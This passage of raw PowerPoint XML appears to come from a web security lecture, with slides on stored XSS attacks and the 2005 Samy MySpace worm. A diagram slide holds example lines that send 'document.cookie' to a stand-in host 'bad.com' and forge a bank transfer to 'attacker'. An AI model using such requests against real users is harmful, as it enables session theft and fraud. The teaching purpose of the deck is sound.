          <p:spPr>
            <a:xfrm>
              <a:off x="320731" y="997810"/>
              <a:ext cx="2498875" cy="19716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lgn="l">
                <a:defRPr sz="4000" b="1">
                  <a:solidFill>
                    <a:srgbClr val="06BC00"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>Inject</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>malicious</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>script</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="739" name="Group 739"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="337667" y="289696"/>
              <a:ext cx="662079" cy="904876"/>
              <a:chOff x="0" y="2976"/>
              <a:chExt cx="662077" cy="904875"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="737" name="Shape 737"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="124375"/>
                <a:ext cx="662078" cy="662078"/>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738" name="Shape 738"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="71934" y="2976"/>
                <a:ext cx="42862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1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="747" name="Group 747"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7986595" y="6213812"/>
            <a:ext cx="7173712" cy="3241880"/>
            <a:chOff x="0" y="4335"/>
            <a:chExt cx="7173711" cy="3241878"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="741" name="Shape 741"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="453857"/>
              <a:ext cx="7173713" cy="2792358"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1016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nvGrpSpPr>
            <p:cNvPr id="746" name="Group 746"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="21528294">
              <a:off x="1263761" y="51532"/>
              <a:ext cx="4551887" cy="2502316"/>
              <a:chOff x="1099" y="2766"/>
              <a:chExt cx="4551885" cy="2502315"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="742" name="Shape 742"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1304020">
                <a:off x="668409" y="1060375"/>
                <a:ext cx="3883280"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lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:t>Request content</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="745" name="Group 745"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1099" y="2766"/>
                <a:ext cx="883741" cy="1059302"/>
                <a:chOff x="1099" y="2766"/>
                <a:chExt cx="883739" cy="1059301"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="743" name="Shape 743"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="1300642">
                  <a:off x="111930" y="201377"/>
                  <a:ext cx="662079" cy="662079"/>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744" name="Shape 744"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="1300642">
                  <a:off x="147311" y="79979"/>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2</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="753" name="Group 753"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7956887" y="7136634"/>
            <a:ext cx="7233126" cy="3351498"/>
            <a:chOff x="-137363" y="-44435"/>
            <a:chExt cx="7233125" cy="3351497"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="748" name="Shape 748"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-137364" y="479513"/>
              <a:ext cx="7233127" cy="2827549"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1016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749" name="Shape 749"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="1290205">
              <a:off x="1181465" y="1347655"/>
              <a:ext cx="5688712"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lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Receive malicious script</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="752" name="Group 752"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="578408" y="-44436"/>
              <a:ext cx="883741" cy="1059302"/>
              <a:chOff x="1099" y="2766"/>
              <a:chExt cx="883739" cy="1059301"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="750" name="Shape 750"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1300642">
                <a:off x="111930" y="201377"/>
                <a:ext cx="662079" cy="662079"/>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751" name="Shape 751"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1300642">
                <a:off x="147311" y="79979"/>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3</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="758" name="Group 758"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3770040" y="8173433"/>
            <a:ext cx="3938652" cy="4021010"/>
            <a:chOff x="0" y="2976"/>
            <a:chExt cx="3938651" cy="4021008"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="754" name="Shape 754"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="833110"/>
              <a:ext cx="3938652" cy="3190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lgn="l">
                <a:defRPr sz="4000"/>
              </a:pPr>
              <a:r>
                <a:t>Execute the</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>malicious script</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:rPr i="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>as though the</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="4000"/>
              </a:pPr>
              <a:r>
                <a:rPr i="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>server meant us</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="4000"/>
              </a:pPr>
              <a:r>
                <a:rPr i="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>to run it</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="757" name="Group 757"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="42715" y="2976"/>
              <a:ext cx="662078" cy="904876"/>
              <a:chOff x="0" y="2976"/>
              <a:chExt cx="662077" cy="904875"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="755" name="Shape 755"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="124375"/>
                <a:ext cx="662078" cy="662078"/>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756" name="Shape 756"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="71934" y="2976"/>
                <a:ext cx="518209"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4</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="764" name="Group 764"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8024013" y="3656615"/>
            <a:ext cx="7192476" cy="2536210"/>
            <a:chOff x="0" y="33410"/>
            <a:chExt cx="7192474" cy="2536208"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="759" name="Shape 759"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="0" y="370242"/>
              <a:ext cx="7192474" cy="2199378"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="101600" cap="flat">
              <a:solidFill>
                <a:schemeClr val="accent5"/>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760" name="Shape 760"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20593436">
              <a:off x="1148109" y="667331"/>
              <a:ext cx="4503548"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solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Steal valuable data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="763" name="Group 763"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="525242">
              <a:off x="414821" y="1264060"/>
              <a:ext cx="926577" cy="1072129"/>
              <a:chOff x="1297" y="2679"/>
              <a:chExt cx="926576" cy="1072127"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="761" name="Shape 761"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20049694">
                <a:off x="133546" y="207704"/>
                <a:ext cx="662079" cy="662078"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="254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762" name="Shape 762"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20049694">
                <a:off x="168927" y="86305"/>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chemeClr val="accent5"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:t>5</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="770" name="Group 770"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="2299948">
            <a:off x="8034630" y="8604199"/>
            <a:ext cx="7208600" cy="2650248"/>
            <a:chOff x="-16125" y="-80626"/>
            <a:chExt cx="7208599" cy="2650246"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="765" name="Shape 765"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="0" y="370242"/>
              <a:ext cx="7192474" cy="2199378"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="101600" cap="flat">
              <a:solidFill>
                <a:schemeClr val="accent5"/>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766" name="Shape 766"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20593436">
              <a:off x="773136" y="690387"/>
              <a:ext cx="5453508"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solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Perform attacker action</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="769" name="Group 769"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="525242">
              <a:off x="60063" y="1424211"/>
              <a:ext cx="926577" cy="1072129"/>
              <a:chOff x="1297" y="2679"/>
              <a:chExt cx="926576" cy="1072127"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="767" name="Shape 767"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20049694">
                <a:off x="133546" y="207704"/>
                <a:ext cx="662079" cy="662078"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="254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768" name="Shape 768"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20049694">
                <a:off x="168927" y="86305"/>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chemeClr val="accent5"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:t>5</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="771" name="Shape 771"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8776084" y="12360979"/>
            <a:ext cx="12118381" cy="638176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFF200">
              <a:alpha val="28000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="127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200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>GET http://bank.com/transfer?amt=9999&amp;to=attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="772" name="Shape 772"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4157489" y="2945259"/>
            <a:ext cx="10411223" cy="638176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFF200">
              <a:alpha val="28000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="127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200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>GET http://bad.com/steal?c=document.cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="773" name="Shape 773"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16395176" y="10873682"/>
            <a:ext cx="583703" cy="533524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1075342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7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7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7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7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7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 grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="740" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="747" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="753" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="758" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="764" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="770" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="771" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="772" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="773"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29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69F4E96B-503B-20DA-B466-B15DD630A475}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Stored XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="776" name="Shape 776"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="567972" indent="-567972" defTabSz="537463">
              <a:spcBef>
                <a:spcPts val="3800"/>
              </a:spcBef>
              <a:defRPr sz="4600"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: User with </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-enabled browser</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> who visits </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user-influenced content</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>page on a vulnerable web service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="567972" indent="-567972" defTabSz="537463">
              <a:spcBef>
                <a:spcPts val="3800"/>
              </a:spcBef>
              <a:defRPr sz="4600"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack goal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: run script in user’s browser with the same access as provided to the server’s regular scripts (i.e., subvert the Same Origin Policy)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="567972" indent="-567972" defTabSz="537463">
              <a:spcBef>
                <a:spcPts val="3800"/>
              </a:spcBef>
              <a:defRPr sz="4600"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker tools</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: ability to leave content on the web server (e.g., via an ordinary browser). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="978977" lvl="1" indent="-570037" defTabSz="537463">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="4232"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Optional tool: a server for receiving stolen user information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="567972" indent="-567972" defTabSz="537463">
              <a:spcBef>
                <a:spcPts val="3800"/>
              </a:spcBef>
              <a:defRPr sz="4600"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key trick</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: Server fails to ensure that content uploaded to page does not contain embedded scripts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49791216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7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7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7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77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7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0" build="p" bldLvl="5"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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the hacker</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="779" name="Shape 779"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="611187" indent="-611187" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:defRPr sz="4950"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Oct 2005, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Samy embedded </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> program in his </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>MySpace</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> page (via stored XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1053465" lvl="1" indent="-613410" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="4554"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>MySpace</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> servers attempted to filter it, but failed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="611187" indent="-611187" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:defRPr sz="4950"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Users who visited his page ran the program, which </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1053465" lvl="1" indent="-613410" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="4554"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>made them friends with Samy;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1053465" lvl="1" indent="-613410" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="4554"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>displayed “but most of all, Samy is my hero” on their profile; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1053465" lvl="1" indent="-613410" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="4554"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>installed the program in their profile, so a new user who viewed profile got infected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="611187" indent="-611187" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:defRPr sz="4950"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>From 73 friends to 1,000,000 friends in 20 hours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1053465" lvl="1" indent="-613410" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="4554"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Took down </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>MySpace</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> for a weekend</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E9C9A3E-269C-ACAB-732F-0C3B8C8DD24F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1498085" y="12506147"/>
            <a:ext cx="2186448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t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>www.vice.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
